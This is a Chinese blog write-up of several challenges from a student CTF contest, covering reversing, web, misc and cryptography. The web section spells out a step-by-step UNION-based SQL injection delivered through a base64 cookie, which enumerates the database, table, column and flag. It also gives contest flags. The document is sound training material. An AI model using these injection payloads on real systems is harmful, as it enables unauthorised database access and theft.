海啸杯部分题目write up

最新推荐文章于 2022-10-24 22:38:13 发布
最新推荐文章于 2022-10-24 22:38:13 发布
阅读量380 收藏
点赞数
文章标签: 海啸杯 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dfeadss/article/details/102679796
版权

海啸杯部分题目write up

海啸杯reverse

baby reverse

打开string window即可查看
在这里插入图片描述

easy reverse

按F5查看代码
打开看到有这么一串字符

在这里插入图片描述
再次点开puts里面的参数
在这里插入图片描述
说明!strcmp(v1, v0)的值要为1,然后strcmp函数为0的时候,里面的v1=v0
已知v0的值是:kanlxvdzTljyTfyTeuor ,现在就求v1的值(即a1)在这里插入图片描述
其中0xC表示十六进制,十进制是12,异或符的运算如下图,12异或12等于0,0异或一个数还是本身,所以就可以把等式左边的^12消去。然后写一个C脚本就可以得到flag

#include "stdio.h"
void main()
{ char a[20]="kanlxvdzTljyTfyTeuor";
  char b[20];
  int i;
  for(i=0;i<20;i++)
  {
  	b[i]=(a[i]-1)^12;
  }
  for(i=0;i<20;i++)
  {
  printf("%c", b[i]);
  }
}

海啸杯web

Gzmtu学生?

打开网页看到在这里插入图片描述
应该是要伪造ip和未受权访问,输入在这里插入图片描述
即可得到flag在这里插入图片描述

宁静致远

首先抓包,发现cookie的参数base64编码点奇怪在这里插入图片描述
url解码然后base64解码后发现是1,很明显的cookie注入。
1'order by 2 -- 查出字段为2
-1'union select 1,2 -- 查出显位为2
-1'union select 1,database()-- 查出数据库库名为ctf
-1'union select 1,(select table_name from information_schema.tables where table_schema='ctf' limit 0,1) -- 查出表名为flag
-1'union select 1,(select column_name from information_schema.columns where table_schema='ctf' and table_name='flag' limit 0,1) -- 查出字段名分别为id和flag
-1'union select 1,(select flag from ctf.flag limit 0,1) -- 查出数据flag{This_is_flag_give_you}
注意语句后面不要写成--+而是--,因为+是url的编码,+原本就是空格。

海啸杯misc

签到题

base64解码

import base64
f = open(r'flag.txt','r')
s = f.read()
f2 = open(r'flag.png','w')
flag = str(base64.b64decode(s))
f2.write(flag)
f2.close()
f.close()

运行一下这个python脚本即可得到flag
在这里插入图片描述

老烟枪

在这里插入图片描述
用binwalk分离一下即可得到隐藏的文件
在这里插入图片描述

海啸杯Cryptography

恺撒将军

/* Note:Your choice is C IDE */
#include "stdio.h"
void main()
{ char a[40]="]p{k]6wmfqozgJ<id[QidKkl[6Qy[5YEf6nziT@@";
  char b[40];
  int i;
  for(i=0;i<40;i++)
  {
      b[i]=a[i]-3;
  }
  for(i=0;i<40;i++)
  {
  printf("%c", b[i]);
  }
}

往前偏移3位,再base64解码即可得到flag
在这里插入图片描述

小明家的小菜园

栅栏密码,找个网站直接解开

df贰连
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
国外海啸算法
10-19
JMA的海啸算法动态
海啸波高转换为地震幅度
06-05
最大海啸波高与因果地震幅度之间存在相当严格的关系。 这为根据相关古海啸事件的观测波高估算过去地震的规模提供了新工具。 该方法针对两个古地震事件进行了测试,并具有相应地震震级的多个独立估计。 海啸波高转换...
第二届海啸部分题目Writeup
SkYe's Blog
10-21 865
第二届海啸部分题目Writeup 文章目录第二届海啸部分题目WriteupMisc签到题flag老烟枪flag表白flag小明的求助flag密码学恺撒将军flag小明家的小菜园flag战报flagreversebaby reverseflageasy reverseflag霸王别姬flag电竞选手flagPwnshellcode脚本simple_stackoverflow脚本 Misc 签到题...
第二届海啸write up
weixin_43460822的博客
10-20 2329
1
hxb海啸
m0_62107966的博客
10-24 1190
查看源代码,拿到flag。
高校战“疫”网络安全分享赛 —— Write-up
a3320315的博客
03-30 2279
Guessgame 这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点 JS的大小写特征 原型链污染 redos盲注 这儿主要着重介绍一下第三个考点 JS的 exec test RegExp match replace spite可以造成redos盲注 /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!'); /Runoo...
海啸hxb
m0_62107966的博客
10-24 1007
web\nwelcome to 海啸\n查看源代码,拿到flag。\n\nHXBCTF{welcome _to_HXB}\n极客邀请函\n考点:SQLite get shell、SUID提权\n\n查看网页源码,看到注释里的PHP代码\n\n\u003C?php\nclass MyDB extends SQLite3\n{\nfunction __construct()\n{\n$this->open('./test.db');\n}\n}\n$db = new MyDB();\nif(!$db){
JAVA 海啸_JAVA日历
weixin_35466750的博客
03-05 167
var months = new Array("一", "二", "三","四", "五", "六", "七", "八", "九","十", "十一", "十二");var daysInMonth = new Array(31, 28, 31, 30, 31, 30, 31, 31,30, 31, 30, 31);var days = new Array("日","一", "二", "三","四"...
matlab源码集锦-海啸传播模型
03-30
matlab源码集锦-海啸传播模型
海啸地震等灾难面前物联网技术可以做些什么?
10-23
灾难面前,搜救遇难者是第一要务,而救灾现场的智能化管理更显得重要。蓬勃发展的物联网技术,面对地震,面对灾...
okada model_okada_海啸断裂层模型fortran代码_海啸_
10-01
主要用于海啸断裂层的模拟,可用于海啸模式的输入
咖啡店管理系统 (Java 版) 源代码+使用说明+可做毕设
06-17
咖啡店管理系统 (Java 版) 源代码 项目简介 这个 Java 项目是一个简单的商店管理系统。该系统处理任何咖啡酒店的业务细节。要制作这个项目,你需要 JetBrains IntelliJ IDE。这个 IDE 将为项目提供设置。你还需要 PostgreSQL 作为数据库。设计简单且用户友好。 系统介绍 关于 Java 版咖啡店管理系统,该系统处理酒店用户的管理。在使用系统之前,你需要先注册然后登录系统。从那里你可以管理你的工作空间,你可以添加客户,管理销售并进行更新。 设计非常简单,用户在操作时不会遇到困难。该项目易于操作和理解。要运行此项目,你必须在电脑上安装 Eclipse IDE 或 JetBrains IntelliJ IDE。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
vspdconfig虚拟串口软件
06-17
用于添加虚拟串口,而不用连接硬件,方便调试。
仿真设计zzz.uvproj
最新发布
06-17
asdf.uvproj
强大且美观的WPF UI控件库:HandyControl
06-17
HandyControl是一套WPF控件库,它几乎重写了所有原生样式,同时包含80余款自定义控件。使用HandyControl你可以轻松地创建一个美观的WPF应用程序,从而大大提高开发效率。
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源
06-17
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源 一款经典的打砖块游戏,画面清晰玩法简单,运行流畅。游戏包括60个关卡,支持3种不同速度的节奏。《打砖块 高清版 Krakout HD》是一款经典的打砖块游戏,你可以自己玩也可以跟朋友一起玩双人模式,游戏有丰富的背景,大量的关卡,劲爆的音乐。PS:如果出现ERR:...
grpcio-1.7.0-cp36-cp36m-win32.whl
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
grpcio-1.7.3-cp36-cp36m-win32.whl
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
海洋地质灾害公开数据库有哪些,网址是什么
02-06
海洋地质灾害公开数据库有: 1. 美国国家海洋和大气管理局 (NOAA) 的海洋地质灾害数据库: ... 这些数据库提供了有关海洋地质灾害的信息, 包括海啸、地震海啸、泥石流、滑坡、沉船等事件的时间、地点、影响等详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值